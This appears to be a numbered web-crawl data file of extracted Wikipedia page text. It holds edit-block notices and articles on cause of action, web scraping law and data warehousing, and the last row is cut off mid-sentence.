541 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=3 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
542 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Cause_of_action | A cause of action or right of action, in law, is a set of facts sufficient to justify suing to obtain money or property, or to justify the enforcement of a legal right against another party. The term also refers to the legal theory upon which a plaintiff brings suit (such as breach of contract, battery, or false imprisonment). The legal document which carries a claim is often called a 'statement of claim' in English law, or a 'complaint' in U.S. federal practice and in many U.S. states. It can be any communication notifying the party to whom it is addressed of an alleged fault which resulted in damages, often expressed in amount of money the receiving party should pay reimburse. 1 To pursue a cause of action, a plaintiff pleads or alleges facts in a complaint, the pleading that initiates a lawsuit. A cause of action generally encompasses both the legal theory (the legal wrong the plaintiff claims to have suffered) and the remedy (the relief a court is asked to grant). Often the facts or circumstances that entitle a person to seek judicial relief may create multiple causes of action. Although it is fairly straightforward to file a statement of claim in most jurisdictions, if it is not done properly, then the filing party may lose their case due to simple technicalities. The need to balance procedural expediency and continuity (the technicalities of which one might fall foul) expressed as procedural rules. There are a number of specific causes of action, including: contract-based actions; statutory causes of action; torts such as assault, battery, invasion of privacy, fraud, slander, negligence, intentional infliction of emotional distress; and suits in equity such as unjust enrichment and quantum meruit. The points a plaintiff must prove to win a given type of case are called the "elements" of that cause of action. For example, for a claim of negligence, the elements are: the (existence of a) duty, breach (of that duty), proximate cause (by that breach), and damages. If a complaint does not allege facts sufficient to support every element of a claim, the court, upon motion by the opposing party, may dismiss the complaint for failure to state a claim for which relief can be granted. The defendant to a cause of action must file an "Answer" to the complaint in which the claims can be admitted or denied (including denial on the basis of insufficient information in the complaint to form a response). The answer may also contain counterclaims in which the "Counterclaim Plaintiff" states its own causes of action. Finally, the answer may contain affirmative defenses. Most defenses must be raised at the first possible opportunity either in the answer or by motion or are deemed waived. A few defenses, in particular a court's lack of subject matter jurisdiction, need not be pleaded and may be raised at any time. Implied cause of action is a term used in United States statutory and constitutional law for circumstances when a court will determine that a law that creates rights also allows private parties to bring a lawsuit, even though no such remedy is explicitly provided for in the law. Implied causes of action arising under the Constitution of the United States are treated differently from those based on statutes. Perhaps the best known case creating an implied cause of action for constitutional rights is Bivens v. Six Unknown Named Agents, 403 U.S. 388 (1971). In that case, the United States Supreme Court ruled that an individual whose Fourth Amendment freedom from unreasonable search and seizures had been violated by federal agents could sue for the violation of the Amendment itself, despite the lack of any federal statute authorizing such a suit. The existence of a remedy for the violation was implied from the importance of the right violated. In a later case, Schweiker v. Chilicky, 487 U.S. 412 (1988), the Supreme Court determined that a cause of action would not be implied for the violation of rights where the U.S. Congress had already provided a remedy for the violation of rights at issue, even if the remedy was inadequate. An implied private right of action is not a cause of action expressly created by a statute. Rather, a court interprets the statute to silently include such a cause of action. Since the 1950s, the United States Supreme Court "has taken three different approaches, each more restrictive than the prior, in deciding when to create private rights of action. 2 In J.I. Case Co. v. Borak (1964), a case under the Securities Exchange Act of 1934, the Court, examining the statute's legislative history and looking at what it believed were the purposes of the statute, held that a private right of action should be implied under 14(a) of the Act. 3 Under the circumstances, the Court said, it was "the duty of the courts to be alert to provide such remedies as are necessary to make effective the congressional purpose. 4 In Cort v. Ash (1975), the issue was whether a civil cause of action existed under a criminal statute prohibiting corporations from making contributions to a presidential campaign. The Court said that no such action should be implied, and laid down four factors to be considered in determining whether a statute implicitly included a private right of action: The Supreme Court used the four-part Cort v. Ash test for several years, and in applying the test, f or the most part, the Court refused to create causes of action. 6 An important application of the test, however, came in Cannon v. University of Chicago (1979), which recognized an implied private right of action. There, a plaintiff sued under Title IX of the Education Amendments of 1972, which prohibited sex discrimination in any federally funded program. The Court, stating that the female plaintiff was within the class protected by the statute, that Congress had intended to create a private right of action to enforce the law, that such a right of action was consistent with the remedial purpose Congress had in mind, and that discrimination was a matter of traditionally federal and not state concern. Justice Powell, however, dissented and criticized the Court's approach to implied rights of action, which he said was incompatible with the doctrine of separation of powers. It was the job of Congress, not the federal courts, Justice Powell said, to create causes of action. Therefore, the only appropriate analysis was whether Congress intended to create a private right of action. "Absent the most compelling evidence of affirmative congressional intent, a federal court should not infer a private cause of action. 7 This became a priority for Justice Powell and a battleground for the Court. 8 Borak, which was also applied under the fourth factor in Cort v. Ash, 9 was singled out by Powell in his Canon dissent: 8 "although I do not suggest that we should consider overruling Borak at this late date, the lack of precedential support for this decision militates strongly against its extension beyond the facts of the case" Very shortly after Cannon was decided, the Court adopted what legal scholars have called a new approach to the issue in Touche Ross Co. v. Redington (1979). 10 11 At issue was an implied right under another section of the Securities Exchange Act of 1934, and the Court said that the first three factors mentioned in Cort v. Ash were simply meant to be "relied upon in determining legislative intent. 12 "The ultimate question, the Court concluded, "is one of legislative intent, not one of whether this Court thinks that it can improve upon the statutory scheme that Congress enacted into law. 13 Despite Justice Powell's admonishment of judicial overreach in his Canon dissent, 14 the Court applied the Cort factor test again in Thompson v. Thompson (1988). 15 In Karahalios v. National Federation of Federal Employees (1989) a unanimous court recognized Cort v. Ash as a test for the implication of private remedies. The Cort v. Ash test has continued to be cited in federal courts, 16 and Justice Neil Gorsuch cited the fourth factor in Rodriguez v. FDIC (2020) to vacate a court of appeals judgment that applied a federal common law test instead of state law. Many states still use the first three Cort factors for their general test for determining whether an implied private cause of action exists under a state statute, including Colorado, 17 Connecticut, 18 Hawaii, 19 Iowa, 20 New York, 21 Pennsylvania, 22 Tennessee, 23 West Virginia, 24 and Washington. 25 Historically, Texas courts had wandered around in a chaotic fashion between the Cort test and a liberal construction test roughly similar to the old Borak test, but in 2004, the Texas Supreme Court overruled both and adopted the textualist Sandoval test. 26 Some states have developed their own tests independently of the Borak, Cort, and Sandoval line of federal cases. For example, prior to 1988, California courts used a vague liberal construction test, under which any statute "embodying a public policy" was privately enforceable by any injured member of the public for whose benefit the statute was enacted. 27 This was most unsatisfactory to conservatives on the Supreme Court of California, such as Associate Justice Frank K. Richardson, who articulated a strict constructionist view in a 1979 dissenting opinion. As Richardson saw it, the Legislature's silence on the issue of whether a cause of action existed to enforce a statute should be interpreted as the Legislature's intent to not create such a cause of action. In November 1986, Chief Justice Rose Bird and two fellow liberal colleagues were ejected from the court by the state's electorate for opposing the death penalty. Bird's replacement, Chief Justice Malcolm M. Lucas, authored an opinion in 1988 that adopted Richardson's strict constructionist view with regard to the interpretation of the California Insurance Code. 28 A 2008 decision by the Court of Appeal 29 and a 2010 decision by the Supreme Court itself 30 finally established that Justice Richardson's strict constructionism as adopted by the Lucas court would retroactively apply to all California statutes. In the 2010 decision in Lu v. Hawaiian Gardens Casino, Justice Ming Chin wrote for a unanimous court that "we begin with the premise that a violation of a state statute does not necessarily give rise to a private cause of action. 30 |
543 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-27 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
544 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=7 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
545 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_warehouse | In computing, a data warehouse (DW or DWH), also known as an enterprise data warehouse (EDW), is a system used for reporting and data analysis and is considered a core component of business intelligence. 1 Data warehouses are central repositories of integrated data from one or more disparate sources. They store current and historical data in one single place that are used for creating reports. This is beneficial for companies as it enables them to interrogate and draw insights from their data and make decisions. 2 The data stored in the warehouse is uploaded from the operational systems (such as marketing or sales). The data may pass through an operational data store and may require data cleansing for additional operations to ensure data quality before it is used in the data warehouse for reporting. Extract, transform, load (ETL) and extract, load, transform (ELT) are the two main approaches used to build a data warehouse system. The typical extract, transform, load (ETL) based data warehouse uses staging, data integration, and access layers to house its key functions. The staging layer or staging database stores raw data extracted from each of the disparate source data systems. The integration layer integrates disparate data sets by transforming the data from the staging layer, often storing this transformed data in an operational data store (ODS) database. The integrated data are then moved to yet another database, often called the data warehouse database, where the data is arranged into hierarchical groups, often called dimensions, and into facts and aggregate facts. The combination of facts and dimensions is sometimes called a star schema. The access layer helps users retrieve data. 3 The main source of the data is cleansed, transformed, catalogued, and made available for use by managers and other business professionals for data mining, online analytical processing, market research and decision support. 4 However, the means to retrieve and analyze data, to extract, transform, and load data, and to manage the data dictionary are also considered essential components of a data warehousing system. Many references to data warehousing use this broader context. Thus, an expanded definition of data warehousing includes business intelligence tools, tools to extract, transform, and load data into the repository, and tools to manage and retrieve metadata. ELT-based data warehousing gets rid of a separate ETL tool for data transformation. Instead, it maintains a staging area inside the data warehouse itself. In this approach, data gets extracted from heterogeneous source systems and are then directly loaded into the data warehouse, before any transformation occurs. All necessary transformations are then handled inside the data warehouse itself. Finally, the manipulated data gets loaded into target tables in the same data warehouse. A data warehouse maintains a copy of information from the source transaction systems. This architectural complexity provides the opportunity to: The environment for data warehouses and marts includes the following: In regards to source systems listed above, R. Kelly Rainer states, "A common source for the data in data warehouses is the company's operational databases, which can be relational databases". 5 Regarding data integration, Rainer states, "It is necessary to extract data from source systems, transform them, and load them into a data mart or warehouse". 5 Rainer discusses storing data in an organization's data warehouse or data marts. 5 Metadata is data about data. "IT personnel need information about data sources; database, table, and column names; refresh schedules; and data usage measures". 5 Today, the most successful companies are those that can respond quickly and flexibly to market changes and opportunities. A key to this response is the effective and efficient use of data and information by analysts and managers. 5 A "data warehouse" is a repository of historical data that is organized by the subject to support decision-makers in the organization. 5 Once data is stored in a data mart or warehouse, it can be accessed. A data mart is a simple form of a data warehouse that is focused on a single subject (or functional area), hence they draw data from a limited number of sources such as sales, finance or marketing. Data marts are often built and controlled by a single department within an organization. The sources could be internal operational systems, a central data warehouse, or external data. 6 Denormalization is the norm for data modeling techniques in this system. Given that data marts generally cover only a subset of the data contained in a data warehouse, they are often easier and faster to implement. Types of data marts include dependent, independent, and hybrid data marts. clarification needed Online analytical processing (OLAP) is characterized by a relatively low volume of transactions. Queries are often very complex and involve aggregations. For OLAP systems, response time is an effective measure. OLAP applications are widely used by Data Mining techniques. OLAP databases store aggregated, historical data in multi-dimensional schemas (usually star schemas). OLAP systems typically have a data latency of a few hours, as opposed to data marts, where latency is expected to be closer to one day. The OLAP approach is used to analyze multidimensional data from multiple sources and perspectives. The three basic operations in OLAP are Roll-up (Consolidation), Drill-down, and Slicing Dicing. Online transaction processing (OLTP) is characterized by a large number of short on-line transactions (INSERT, UPDATE, DELETE). OLTP systems emphasize very fast query processing and maintaining data integrity in multi-access environments. For OLTP systems, effectiveness is measured by the number of transactions per second. OLTP databases contain detailed and current data. The schema used to store transactional databases is the entity model (usually 3NF). 7 Normalization is the norm for data modeling techniques in this system. Predictive analytics is about finding and quantifying hidden patterns in the data using complex mathematical models that can be used to predict future outcomes. Predictive analysis is different from OLAP in that OLAP focuses on historical data analysis and is reactive in nature, while predictive analysis focuses on the future. These systems are also used for customer relationship management (CRM). The concept of data warehousing dates back to the late 1980s 8 when IBM researchers Barry Devlin and Paul Murphy developed the "business data warehouse". In essence, the data warehousing concept was intended to provide an architectural model for the flow of data from operational systems to decision support environments. The concept attempted to address the various problems associated with this flow, mainly the high costs associated with it. In the absence of a data warehousing architecture, an enormous amount of redundancy was required to support multiple decision support environments. In larger corporations, it was typical for multiple decision support environments to operate independently. Though each environment served different users, they often required much of the same stored data. The process of gathering, cleaning and integrating data from various sources, usually from long-term existing operational systems (usually referred to as legacy systems), was typically in part replicated for each environment. Moreover, the operational systems were frequently reexamined as new decision support requirements emerged. Often new requirements necessitated gathering, cleaning and integrating new data from "data marts" that was tailored for ready access by users. Additionally, with the publication of The IRM Imperative (Wiley Sons, 1991) by James M. Kerr, the idea of managing and putting a dollar value on an organization's data resources and then reporting that value as an asset on a balance sheet became popular. In the book, Kerr described a way to populate subject-area databases from data derived from transaction-driven systems to create a storage area where summary data could be further leveraged to inform executive decision-making. This concept served to promote further thinking of how a data warehouse could be developed and managed in a practical way within any enterprise. Key developments in early years of data warehousing: A fact is a value, or measurement, which represents a fact about the managed entity or system. Facts, as reported by the reporting entity, are said to be at raw level; e.g., in a mobile telephone system, if a BTS (base transceiver station) receives 1,000 requests for traffic channel allocation, allocates for 820, and rejects the remaining, it would report three facts or measurements to a management system: Facts at the raw level are further aggregated to higher levels in various dimensions to extract more service or business-relevant information from it. These are called aggregates or summaries or aggregated facts. For instance, if there are three BTS in a city, then the facts above can be aggregated from the BTS to the city level in the network dimension. For example: There are three or more leading approaches to storing data in a data warehouse the most important approaches are the dimensional approach and the normalized approach. The dimensional approach refers to Ralph Kimball's approach in which it is stated that the data warehouse should be modeled using a Dimensional Model star schema. The normalized approach, also called the 3NF model (Third Normal Form), refers to Bill Inmon's approach in which it is stated that the data warehouse should be modeled using an E-R model normalized model. 22 In a dimensional approach, transaction data is partitioned into "facts", which are generally numeric transaction data, and "dimensions", which are the reference information that gives context to the facts. For example, a sales transaction can be broken up into facts such as the number of products ordered and the total price paid for the products, and into dimensions such as order date, customer name, product number, order ship-to and bill-to locations, and salesperson responsible for receiving the order. A key advantage of a dimensional approach is that the data warehouse is easier for the user to understand and to use. Also, the retrieval of data from the data warehouse tends to operate very quickly. 16 Dimensional structures are easy to understand for business users, because the structure is divided into measurements facts and context dimensions. Facts are related to the organization's business processes and operational system whereas the dimensions surrounding them contain context about the measurement (Kimball, Ralph 2008). Another advantage offered by dimensional model is that it does not involve a relational database every time. Thus, this type of modeling technique is very useful for end-user queries in data warehouse. The model of facts and dimensions can also be understood as a data cube. 23 Where the dimensions are the categorical coordinates in a multi-dimensional cube, the fact is a value corresponding to the coordinates. The main disadvantages of the dimensional approach are the following: In the normalized approach, the data in the data warehouse are stored following, to a degree, database normalization rules. Tables are grouped together by subject areas that reflect general data categories (e.g., data on customers, products, finance, etc.). The normalized structure divides data into entities, which creates several tables in a relational database. When applied in large enterprises the result is dozens of tables that are linked together by a web of joins. Furthermore, each of the created entities is converted into separate physical tables when the database is implemented (Kimball, Ralph 2008). The main advantage of this approach is that it is straightforward to add information into the database. Some disadvantages of this approach are that, because of the number of tables involved, it can be difficult for users to join data from different sources into meaningful information and to access the information without a precise understanding of the sources of data and of the data structure of the data warehouse. Both normalized and dimensional models can be represented in entity relationship diagrams as both contain joined relational tables. The difference between the two models is the degree of normalization (also known as Normal Forms). These approaches are not mutually exclusive, and there are other approaches. Dimensional approaches can involve normalizing data to a degree (Kimball, Ralph 2008). In Information-Driven Business, 24 Robert Hillard proposes an approach to comparing the two approaches based on the information needs of the business problem. The technique shows that normalized models hold far more information than their dimensional equivalents (even when the same fields are used in both models) but this extra information comes at the cost of usability. The technique measures information quantity in terms of information entropy and usability in terms of the Small Worlds data transformation measure. 25 In the bottom-up approach, data marts are first created to provide reporting and analytical capabilities for specific business processes. These data marts can then be integrated to create a comprehensive data warehouse. The data warehouse bus architecture is primarily an implementation of "the bus", a collection of conformed dimensions and conformed facts, which are dimensions that are shared (in a specific way) between facts in two or more data marts. 26 The top-down approach is designed using a normalized enterprise data model. "Atomic" data, that is, data at the greatest level of detail, are stored in the data warehouse. Dimensional data marts containing data needed for specific business processes or specific departments are created from the data warehouse. 27 Data warehouses often resemble the hub and spokes architecture. Legacy systems feeding the warehouse often include customer relationship management and enterprise resource planning, generating large amounts of data. To consolidate these various data models, and facilitate the extract transform load process, data warehouses often make use of an operational data store, the information from which is parsed into the actual data warehouse. To reduce data redundancy, larger systems often store the data in a normalized way. Data marts for specific reports can then be built on top of the data warehouse. A 